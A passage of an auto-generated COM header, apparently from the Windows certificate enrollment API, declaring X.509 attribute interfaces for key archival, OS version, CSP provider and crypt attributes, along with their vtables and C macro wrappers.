            /* [retval][out] */ __RPC__out LONG *pValue);
        
        END_INTERFACE
    } IX509AttributeArchiveKeyVtbl;

    interface IX509AttributeArchiveKey
    {
        CONST_VTBL struct IX509AttributeArchiveKeyVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509AttributeArchiveKey_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509AttributeArchiveKey_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509AttributeArchiveKey_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509AttributeArchiveKey_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509AttributeArchiveKey_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509AttributeArchiveKey_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509AttributeArchiveKey_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509AttributeArchiveKey_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509AttributeArchiveKey_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509AttributeArchiveKey_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509AttributeArchiveKey_InitializeEncode(This,pKey,Encoding,strCAXCert,pAlgorithm,EncryptionStrength)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pKey,Encoding,strCAXCert,pAlgorithm,EncryptionStrength) ) 

#define IX509AttributeArchiveKey_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509AttributeArchiveKey_get_EncryptedKeyBlob(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_EncryptedKeyBlob(This,Encoding,pValue) ) 

#define IX509AttributeArchiveKey_get_EncryptionAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_EncryptionAlgorithm(This,ppValue) ) 

#define IX509AttributeArchiveKey_get_EncryptionStrength(This,pValue)	\
    ( (This)->lpVtbl -> get_EncryptionStrength(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509AttributeArchiveKey_INTERFACE_DEFINED__ */


#ifndef __IX509AttributeArchiveKeyHash_INTERFACE_DEFINED__
#define __IX509AttributeArchiveKeyHash_INTERFACE_DEFINED__

/* interface IX509AttributeArchiveKeyHash */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509AttributeArchiveKeyHash;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab328-217d-11da-b2a4-000e7bbb2b09")
    IX509AttributeArchiveKeyHash : public IX509Attribute
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncodeFromEncryptedKeyBlob( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncryptedKeyBlob) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncryptedKeyHashBlob( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509AttributeArchiveKeyHashVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509AttributeArchiveKeyHash * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509AttributeArchiveKeyHash * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509AttributeArchiveKeyHash * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncodeFromEncryptedKeyBlob )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncryptedKeyBlob);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptedKeyHashBlob )( 
            __RPC__in IX509AttributeArchiveKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509AttributeArchiveKeyHashVtbl;

    interface IX509AttributeArchiveKeyHash
    {
        CONST_VTBL struct IX509AttributeArchiveKeyHashVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509AttributeArchiveKeyHash_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509AttributeArchiveKeyHash_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509AttributeArchiveKeyHash_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509AttributeArchiveKeyHash_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509AttributeArchiveKeyHash_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509AttributeArchiveKeyHash_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509AttributeArchiveKeyHash_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509AttributeArchiveKeyHash_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509AttributeArchiveKeyHash_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509AttributeArchiveKeyHash_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509AttributeArchiveKeyHash_InitializeEncodeFromEncryptedKeyBlob(This,Encoding,strEncryptedKeyBlob)	\
    ( (This)->lpVtbl -> InitializeEncodeFromEncryptedKeyBlob(This,Encoding,strEncryptedKeyBlob) ) 

#define IX509AttributeArchiveKeyHash_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509AttributeArchiveKeyHash_get_EncryptedKeyHashBlob(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_EncryptedKeyHashBlob(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509AttributeArchiveKeyHash_INTERFACE_DEFINED__ */


#ifndef __IX509AttributeOSVersion_INTERFACE_DEFINED__
#define __IX509AttributeOSVersion_INTERFACE_DEFINED__

/* interface IX509AttributeOSVersion */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509AttributeOSVersion;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab32a-217d-11da-b2a4-000e7bbb2b09")
    IX509AttributeOSVersion : public IX509Attribute
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in BSTR strOSVersion) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_OSVersion( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509AttributeOSVersionVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509AttributeOSVersion * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509AttributeOSVersion * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509AttributeOSVersion * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [in] */ __RPC__in BSTR strOSVersion);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OSVersion )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509AttributeOSVersionVtbl;

    interface IX509AttributeOSVersion
    {
        CONST_VTBL struct IX509AttributeOSVersionVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509AttributeOSVersion_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509AttributeOSVersion_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509AttributeOSVersion_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509AttributeOSVersion_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509AttributeOSVersion_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509AttributeOSVersion_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509AttributeOSVersion_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509AttributeOSVersion_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509AttributeOSVersion_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509AttributeOSVersion_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509AttributeOSVersion_InitializeEncode(This,strOSVersion)	\
    ( (This)->lpVtbl -> InitializeEncode(This,strOSVersion) ) 

#define IX509AttributeOSVersion_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509AttributeOSVersion_get_OSVersion(This,pValue)	\
    ( (This)->lpVtbl -> get_OSVersion(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509AttributeOSVersion_INTERFACE_DEFINED__ */


#ifndef __IX509AttributeCspProvider_INTERFACE_DEFINED__
#define __IX509AttributeCspProvider_INTERFACE_DEFINED__

/* interface IX509AttributeCspProvider */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509AttributeCspProvider;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab32b-217d-11da-b2a4-000e7bbb2b09")
    IX509AttributeCspProvider : public IX509Attribute
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ X509KeySpec KeySpec,
            /* [in] */ __RPC__in BSTR strProviderName,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strSignature) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_KeySpec( 
            /* [retval][out] */ __RPC__out X509KeySpec *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ProviderName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Signature( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509AttributeCspProviderVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509AttributeCspProvider * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509AttributeCspProvider * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509AttributeCspProvider * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ X509KeySpec KeySpec,
            /* [in] */ __RPC__in BSTR strProviderName,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strSignature);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeySpec )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [retval][out] */ __RPC__out X509KeySpec *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ProviderName )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Signature )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509AttributeCspProviderVtbl;

    interface IX509AttributeCspProvider
    {
        CONST_VTBL struct IX509AttributeCspProviderVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509AttributeCspProvider_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509AttributeCspProvider_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509AttributeCspProvider_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509AttributeCspProvider_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509AttributeCspProvider_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509AttributeCspProvider_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509AttributeCspProvider_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509AttributeCspProvider_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509AttributeCspProvider_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509AttributeCspProvider_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509AttributeCspProvider_InitializeEncode(This,KeySpec,strProviderName,Encoding,strSignature)	\
    ( (This)->lpVtbl -> InitializeEncode(This,KeySpec,strProviderName,Encoding,strSignature) ) 

#define IX509AttributeCspProvider_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509AttributeCspProvider_get_KeySpec(This,pValue)	\
    ( (This)->lpVtbl -> get_KeySpec(This,pValue) ) 

#define IX509AttributeCspProvider_get_ProviderName(This,pValue)	\
    ( (This)->lpVtbl -> get_ProviderName(This,pValue) ) 

#define IX509AttributeCspProvider_get_Signature(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Signature(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509AttributeCspProvider_INTERFACE_DEFINED__ */


#ifndef __ICryptAttribute_INTERFACE_DEFINED__
#define __ICryptAttribute_INTERFACE_DEFINED__

/* interface ICryptAttribute */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICryptAttribute;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab32c-217d-11da-b2a4-000e7bbb2b09")
    ICryptAttribute : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromObjectId( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromValues( 
            /* [in] */ __RPC__in_opt IX509Attributes *pAttributes) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Values( 
            /* [retval][out] */ __RPC__deref_out_opt IX509Attributes **ppValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICryptAttributeVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICryptAttribute * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICryptAttribute * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICryptAttribute * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICryptAttribute * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICryptAttribute * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICryptAttribute * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICryptAttribute * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromObjectId )( 
            __RPC__in ICryptAttribute * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromValues )( 
            __RPC__in ICryptAttribute * This,
            /* [in] */ __RPC__in_opt IX509Attributes *pAttributes);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in ICryptAttribute * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Values )( 
            __RPC__in ICryptAttribute * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Attributes **ppValue);
        
        END_INTERFACE
    } ICryptAttributeVtbl;

    interface ICryptAttribute
    {
        CONST_VTBL struct ICryptAttributeVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICryptAttribute_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICryptAttribute_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICryptAttribute_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICryptAttribute_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICryptAttribute_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICryptAttribute_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICryptAttribute_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICryptAttribute_InitializeFromObjectId(This,pObjectId)	\
    ( (This)->lpVtbl -> InitializeFromObjectId(This,pObjectId) ) 

#define ICryptAttribute_InitializeFromValues(This,pAttributes)	\
    ( (This)->lpVtbl -> InitializeFromValues(This,pAttributes) ) 

#define ICryptAttribute_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define ICryptAttribute_get_Values(This,ppValue)	\
    ( (This)->lpVtbl -> get_Values(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICryptAttribute_INTERFACE_DEFINED__ */


#ifndef __ICryptAttributes_INTERFACE_DEFINED__
#define __ICryptAttributes_INTERFACE_DEFINED__

/* interface ICryptAttributes */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICryptAttributes;

